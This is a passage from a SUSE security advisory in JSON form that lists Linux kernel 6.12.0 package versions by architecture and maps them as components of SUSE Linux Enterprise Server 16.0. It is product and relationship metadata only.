}
},
{
"category": "product_version",
"name": "kernel-docs-html-6.12.0-160000.26.1.noarch",
"product": {
"name": "kernel-docs-html-6.12.0-160000.26.1.noarch",
"product_id": "kernel-docs-html-6.12.0-160000.26.1.noarch"
}
},
{
"category": "product_version",
"name": "kernel-macros-6.12.0-160000.26.1.noarch",
"product": {
"name": "kernel-macros-6.12.0-160000.26.1.noarch",
"product_id": "kernel-macros-6.12.0-160000.26.1.noarch"
}
},
{
"category": "product_version",
"name": "kernel-source-6.12.0-160000.26.1.noarch",
"product": {
"name": "kernel-source-6.12.0-160000.26.1.noarch",
"product_id": "kernel-source-6.12.0-160000.26.1.noarch"
}
},
{
"category": "product_version",
"name": "kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"product": {
"name": "kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"product_id": "kernel-source-vanilla-6.12.0-160000.26.1.noarch"
}
}
],
"category": "architecture",
"name": "noarch"
},
{
"branches": [
{
"category": "product_version",
"name": "cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"product": {
"name": "cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"product_id": "cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le"
}
},
{
"category": "product_version",
"name": "dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"product": {
"name": "dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"product_id": "dlm-kmp-default-6.12.0-160000.26.1.ppc64le"
}
},
{
"category": "product_version",
"name": "gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"product": {
"name": "gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"product_id": "gfs2-kmp-default-6.12.0-160000.26.1.ppc64le"
}
},
{
"category": "product_version",
"name": "kernel-default-6.12.0-160000.26.1.ppc64le",
"product": {
"name": "kernel-default-6.12.0-160000.26.1.ppc64le",
"product_id": "kernel-default-6.12.0-160000.26.1.ppc64le"
}
},
{
"category": "product_version",
"name": "kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"product": {
"name": "kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"product_id": "kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le"
}
},
{
"category": "product_version",
"name": "kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"product": {
"name": "kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"product_id": "kernel-default-devel-6.12.0-160000.26.1.ppc64le"
}
},
{
"category": "product_version",
"name": "kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"product": {
"name": "kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"product_id": "kernel-default-extra-6.12.0-160000.26.1.ppc64le"
}
},
{
"category": "product_version",
"name": "kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"product": {
"name": "kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"product_id": "kernel-default-livepatch-6.12.0-160000.26.1.ppc64le"
}
},
{
"category": "product_version",
"name": "kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"product": {
"name": "kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"product_id": "kernel-kvmsmall-6.12.0-160000.26.1.ppc64le"
}
},
{
"category": "product_version",
"name": "kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"product": {
"name": "kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"product_id": "kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le"
}
},
{
"category": "product_version",
"name": "kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"product": {
"name": "kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"product_id": "kernel-obs-qa-6.12.0-160000.26.1.ppc64le"
}
},
{
"category": "product_version",
"name": "kernel-syms-6.12.0-160000.26.1.ppc64le",
"product": {
"name": "kernel-syms-6.12.0-160000.26.1.ppc64le",
"product_id": "kernel-syms-6.12.0-160000.26.1.ppc64le"
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "kernel-default-6.12.0-160000.26.1.s390x",
"product": {
"name": "kernel-default-6.12.0-160000.26.1.s390x",
"product_id": "kernel-default-6.12.0-160000.26.1.s390x"
}
},
{
"category": "product_version",
"name": "kernel-default-devel-6.12.0-160000.26.1.s390x",
"product": {
"name": "kernel-default-devel-6.12.0-160000.26.1.s390x",
"product_id": "kernel-default-devel-6.12.0-160000.26.1.s390x"
}
},
{
"category": "product_version",
"name": "kernel-default-extra-6.12.0-160000.26.1.s390x",
"product": {
"name": "kernel-default-extra-6.12.0-160000.26.1.s390x",
"product_id": "kernel-default-extra-6.12.0-160000.26.1.s390x"
}
},
{
"category": "product_version",
"name": "kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"product": {
"name": "kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"product_id": "kernel-default-livepatch-6.12.0-160000.26.1.s390x"
}
},
{
"category": "product_version",
"name": "kernel-obs-qa-6.12.0-160000.26.1.s390x",
"product": {
"name": "kernel-obs-qa-6.12.0-160000.26.1.s390x",
"product_id": "kernel-obs-qa-6.12.0-160000.26.1.s390x"
}
},
{
"category": "product_version",
"name": "kernel-syms-6.12.0-160000.26.1.s390x",
"product": {
"name": "kernel-syms-6.12.0-160000.26.1.s390x",
"product_id": "kernel-syms-6.12.0-160000.26.1.s390x"
}
},
{
"category": "product_version",
"name": "kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"product": {
"name": "kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"product_id": "kernel-zfcpdump-6.12.0-160000.26.1.s390x"
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"product": {
"name": "cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"product_id": "cluster-md-kmp-default-6.12.0-160000.26.1.x86_64"
}
},
{
"category": "product_version",
"name": "dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"product": {
"name": "dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"product_id": "dlm-kmp-default-6.12.0-160000.26.1.x86_64"
}
},
{
"category": "product_version",
"name": "gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"product": {
"name": "gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"product_id": "gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
}
},
{
"category": "product_version",
"name": "kernel-azure-6.12.0-160000.26.1.x86_64",
"product": {
"name": "kernel-azure-6.12.0-160000.26.1.x86_64",
"product_id": "kernel-azure-6.12.0-160000.26.1.x86_64"
}
},
{
"category": "product_version",
"name": "kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"product": {
"name": "kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"product_id": "kernel-azure-devel-6.12.0-160000.26.1.x86_64"
}
},
{
"category": "product_version",
"name": "kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"product": {
"name": "kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"product_id": "kernel-azure-extra-6.12.0-160000.26.1.x86_64"
}
},
{
"category": "product_version",
"name": "kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"product": {
"name": "kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"product_id": "kernel-azure-vdso-6.12.0-160000.26.1.x86_64"
}
},
{
"category": "product_version",
"name": "kernel-default-6.12.0-160000.26.1.x86_64",
"product": {
"name": "kernel-default-6.12.0-160000.26.1.x86_64",
"product_id": "kernel-default-6.12.0-160000.26.1.x86_64"
}
},
{
"category": "product_version",
"name": "kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"product": {
"name": "kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"product_id": "kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64"
}
},
{
"category": "product_version",
"name": "kernel-default-devel-6.12.0-160000.26.1.x86_64",
"product": {
"name": "kernel-default-devel-6.12.0-160000.26.1.x86_64",
"product_id": "kernel-default-devel-6.12.0-160000.26.1.x86_64"
}
},
{
"category": "product_version",
"name": "kernel-default-extra-6.12.0-160000.26.1.x86_64",
"product": {
"name": "kernel-default-extra-6.12.0-160000.26.1.x86_64",
"product_id": "kernel-default-extra-6.12.0-160000.26.1.x86_64"
}
},
{
"category": "product_version",
"name": "kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"product": {
"name": "kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"product_id": "kernel-default-livepatch-6.12.0-160000.26.1.x86_64"
}
},
{
"category": "product_version",
"name": "kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"product": {
"name": "kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"product_id": "kernel-default-vdso-6.12.0-160000.26.1.x86_64"
}
},
{
"category": "product_version",
"name": "kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"product": {
"name": "kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"product_id": "kernel-kvmsmall-6.12.0-160000.26.1.x86_64"
}
},
{
"category": "product_version",
"name": "kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"product": {
"name": "kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"product_id": "kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64"
}
},
{
"category": "product_version",
"name": "kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"product": {
"name": "kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"product_id": "kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64"
}
},
{
"category": "product_version",
"name": "kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"product": {
"name": "kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"product_id": "kernel-obs-qa-6.12.0-160000.26.1.x86_64"
}
},
{
"category": "product_version",
"name": "kernel-syms-6.12.0-160000.26.1.x86_64",
"product": {
"name": "kernel-syms-6.12.0-160000.26.1.x86_64",
"product_id": "kernel-syms-6.12.0-160000.26.1.x86_64"
}
}
],
"category": "architecture",
"name": "x86_64"
},
{
"branches": [
{
"category": "product_name",
"name": "SUSE Linux Enterprise Server 16.0",
"product": {
"name": "SUSE Linux Enterprise Server 16.0",
"product_id": "SUSE Linux Enterprise Server 16.0",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sles:16.0"
}
}
},
{
"category": "product_name",
"name": "SUSE Linux Enterprise Server for SAP applications 16.0",
"product": {
"name": "SUSE Linux Enterprise Server for SAP applications 16.0",
"product_id": "SUSE Linux Enterprise Server for SAP applications 16.0",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sles:16:16.0:server-sap"
}
}
}
],
"category": "product_family",
"name": "SUSE Linux Enterprise"
}
],
"category": "vendor",
"name": "SUSE"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le as component of SUSE Linux Enterprise Server 16.0",
"product_id": "SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le"
},
"product_reference": "cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"relates_to_product_reference": "SUSE Linux Enterprise Server 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "cluster-md-kmp-default-6.12.0-160000.26.1.x86_64 as component of SUSE Linux Enterprise Server 16.0",
"product_id": "SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64"
},
"product_reference": "cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Server 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "dlm-kmp-default-6.12.0-160000.26.1.ppc64le as component of SUSE Linux Enterprise Server 16.0",
"product_id": "SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le"
},
"product_reference": "dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"relates_to_product_reference": "SUSE Linux Enterprise Server 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "dlm-kmp-default-6.12.0-160000.26.1.x86_64 as component of SUSE Linux Enterprise Server 16.0",
"product_id": "SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64"
},
"product_reference": "dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Server 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "gfs2-kmp-default-6.12.0-160000.26.1.ppc64le as component of SUSE Linux Enterprise Server 16.0",
"product_id": "SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le"
},
"product_reference": "gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"relates_to_product_reference": "SUSE Linux Enterprise Server 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "gfs2-kmp-default-6.12.0-160000.26.1.x86_64 as component of SUSE Linux Enterprise Server 16.0",
"product_id": "SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
},
"product_reference": "gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Server 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64kb-6.12.0-160000.26.1.aarch64 as component of SUSE Linux Enterprise Server 16.0",
"product_id": "SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64"
},
"product_reference": "kernel-64kb-6.12.0-160000.26.1.aarch64",
"relates_to_product_reference": "SUSE Linux Enterprise Server 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64kb-devel-6.12.0-160000.26.1.aarch64 as component of SUSE Linux Enterprise Server 16.0",
"product_id": "SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64"
},
"product_reference": "kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"relates_to_product_reference": "SUSE Linux Enterprise Server 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64kb-extra-6.12.0-160000.26.1.aarch64 as component of SUSE Linux Enterprise Server 16.0",
"product_id": "SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64"
},
"product_reference": "kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"relates_to_product_reference": "SUSE Linux Enterprise Server 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-azure-6.12.0-160000.26.1.aarch64 as component of SUSE Linux Enterprise Server 16.0",
"product_id": "SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64"
},
"product_reference": "kernel-azure-6.12.0-160000.26.1.aarch64",
"relates_to_product_reference": "SUSE Linux Enterprise Server 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-azure-6.12.0-160000.26.1.x86_64 as component of SUSE Linux Enterprise Server 16.0",
"product_id": "SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64"
},
"product_reference": "kernel-azure-6.12.0-160000.26.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Server 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-azure-devel-6.12.0-160000.26.1.aarch64 as component of SUSE Linux Enterprise Server 16.0",
"product_id": "SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64"
},
"product_reference": "kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"relates_to_product_reference": "SUSE Linux Enterprise Server 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-azure-devel-6.12.0-160000.26.1.x86_64 as component of SUSE Linux Enterprise Server 16.0",
"product_id": "SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64"
},
"product_reference": "kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Server 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-azure-extra-6.12.0-160000.26.1.aarch64 as component of SUSE Linux Enterprise Server 16.0",
"product_id": "SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64"
},
"product_reference": "kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"relates_to_product_reference": "SUSE Linux Enterprise Server 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-azure-extra-6.12.0-160000.26.1.x86_64 as component of SUSE Linux Enterprise Server 16.0",
"product_id": "SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64"
},
"product_reference": "kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Server 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-azure-vdso-6.12.0-160000.26.1.x86_64 as component of SUSE Linux Enterprise Server 16.0",
"product_id": "SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64"
},
"product_reference": "kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Server 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-default-6.12.0-160000.26.1.aarch64 as component of SUSE Linux Enterprise Server 16.0",
"product_id": "SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64"
},
"product_reference": "kernel-default-6.12.0-160000.26.1.aarch64",
"relates_to_product_reference": "SUSE Linux Enterprise Server 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-default-6.12.0-160000.26.1.ppc64le as component of SUSE Linux Enterprise Server 16.0",
"product_id": "SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le"
},
"product_reference": "kernel-default-6.12.0-160000.26.1.ppc64le",
"relates_to_product_reference": "SUSE Linux Enterprise Server 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-default-6.12.0-160000.26.1.s390x as component of SUSE Linux Enterprise Server 16.0",
"product_id": "SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x"
},
"product_reference": "kernel-default-6.12.0-160000.26.1.s390x",
"relates_to_product_reference": "SUSE Linux Enterprise Server 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-default-6.12.0-160000.26.1.x86_64 as component of SUSE Linux Enterprise Server 16.0",
"product_id": "SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64"
},
"product_reference": "kernel-default-6.12.0-160000.26.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Server 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64 as component of SUSE Linux Enterprise Server 16.0",
"product_id": "SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64"
},
"product_reference": "kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"relates_to_product_reference": "SUSE Linux Enterprise Server 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le as component of SUSE Linux Enterprise Server 16.0",
"product_id": "SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le"
},
"product_reference": "kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"relates_to_product_reference": "SUSE Linux Enterprise Server 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64 as component of SUSE Linux Enterprise Server 16.0",
"product_id": "SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64"
},
"product_reference": "kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Server 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-default-devel-6.12.0-160000.26.1.aarch64 as component of SUSE Linux Enterprise Server 16.0",
"product_id": "SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64"
},
"product_reference": "kernel-default-devel-6.12.0-160000.26.1.aarch64",
"relates_to_product_reference": "SUSE Linux Enterprise Server 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-default-devel-6.12.0-160000.26.1.ppc64le as component of SUSE Linux Enterprise Server 16.0",
"product_id": "SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le"
},
"product_reference": "kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"relates_to_product_reference": "SUSE Linux Enterprise Server 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-default-devel-6.12.0-160000.26.1.s390x as component of SUSE Linux Enterprise Server 16.0",
"product_id": "SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x"
},
"product_reference": "kernel-default-devel-6.12.0-160000.26.1.s390x",
"relates_to_product_reference": "SUSE Linux Enterprise Server 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-default-devel-6.12.0-160000.26.1.x86_64 as component of SUSE Linux Enterprise Server 16.0",
"product_id": "SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64"
},
"product_reference": "kernel-default-devel-6.12.0-160000.26.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Server 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-default-extra-6.12.0-160000.26.1.aarch64 as component of SUSE Linux Enterprise Server 16.0",
"product_id": "SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64"
},
"product_reference": "kernel-default-extra-6.12.0-160000.26.1.aarch64",
"relates_to_product_reference": "SUSE Linux Enterprise Server 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-default-extra-6.12.0-160000.26.1.ppc64le as component of SUSE Linux Enterprise Server 16.0",
"product_id": "SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le"
},
"product_reference": "kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"relates_to_product_reference": "SUSE Linux Enterprise Server 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-default-extra-6.12.0-160000.26.1.s390x as component of SUSE Linux Enterprise Server 16.0",
"product_id": "SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x"
},
"product_reference": "kernel-default-extra-6.12.0-160000.26.1.s390x",
"relates_to_product_reference": "SUSE Linux Enterprise Server 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-default-extra-6.12.0-160000.26.1.x86_64 as component of SUSE Linux Enterprise Server 16.0",
"product_id": "SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64"
},
"product_reference": "kernel-default-extra-6.12.0-160000.26.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Server 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-default-livepatch-6.12.0-160000.26.1.ppc64le as component of SUSE Linux Enterprise Server 16.0",
"product_id": "SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le"
},
"product_reference": "kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"relates_to_product_reference": "SUSE Linux Enterprise Server 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-default-livepatch-6.12.0-160000.26.1.s390x as component of SUSE Linux Enterprise Server 16.0",
"product_id": "SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x"
},
"product_reference": "kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"relates_to_product_reference": "SUSE Linux Enterprise Server 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-default-livepatch-6.12.0-160000.26.1.x86_64 as component of SUSE Linux Enterprise Server 16.0",
"product_id": "SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64"
},
"product_reference": "kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Server 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-default-vdso-6.12.0-160000.26.1.x86_64 as component of SUSE Linux Enterprise Server 16.0",
"product_id": "SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64"
},
"product_reference": "kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Server 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-6.12.0-160000.26.1.noarch as component of SUSE Linux Enterprise Server 16.0",
"product_id": "SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch"
},
"product_reference": "kernel-devel-6.12.0-160000.26.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Server 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-docs-6.12.0-160000.26.1.noarch as component of SUSE Linux Enterprise Server 16.0",
"product_id": "SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch"
},
"product_reference": "kernel-docs-6.12.0-160000.26.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Server 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-docs-html-6.12.0-160000.26.1.noarch as component of SUSE Linux Enterprise Server 16.0",
"product_id": "SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch"
},
"product_reference": "kernel-docs-html-6.12.0-160000.26.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Server 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-kvmsmall-6.12.0-160000.26.1.aarch64 as component of SUSE Linux Enterprise Server 16.0",
"product_id": "SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64"
},
"product_reference": "kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"relates_to_product_reference": "SUSE Linux Enterprise Server 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-kvmsmall-6.12.0-160000.26.1.ppc64le as component of SUSE Linux Enterprise Server 16.0",
"product_id": "SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le"
},
"product_reference": "kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"relates_to_product_reference": "SUSE Linux Enterprise Server 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-kvmsmall-6.12.0-160000.26.1.x86_64 as component of SUSE Linux Enterprise Server 16.0",
"product_id": "SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64"
},
"product_reference": "kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Server 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64 as component of SUSE Linux Enterprise Server 16.0",
"product_id": "SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64"
},
"product_reference": "kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"relates_to_product_reference": "SUSE Linux Enterprise Server 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le as component of SUSE Linux Enterprise Server 16.0",
"product_id": "SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le"
},
"product_reference": "kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"relates_to_product_reference": "SUSE Linux Enterprise Server 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64 as component of SUSE Linux Enterprise Server 16.0",
"product_id": "SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64"
},
"product_reference": "kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Server 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64 as component of SUSE Linux Enterprise Server 16.0",
"product_id": "SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64"
},
"product_reference": "kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Server 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-macros-6.12.0-160000.26.1.noarch as component of SUSE Linux Enterprise Server 16.0",
"product_id": "SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch"
},
"product_reference": "kernel-macros-6.12.0-160000.26.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Server 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-obs-qa-6.12.0-160000.26.1.aarch64 as component of SUSE Linux Enterprise Server 16.0",
"product_id": "SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64"
},
"product_reference": "kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"relates_to_product_reference": "SUSE Linux Enterprise Server 16.0"
},
{
"category": "default_component_of",
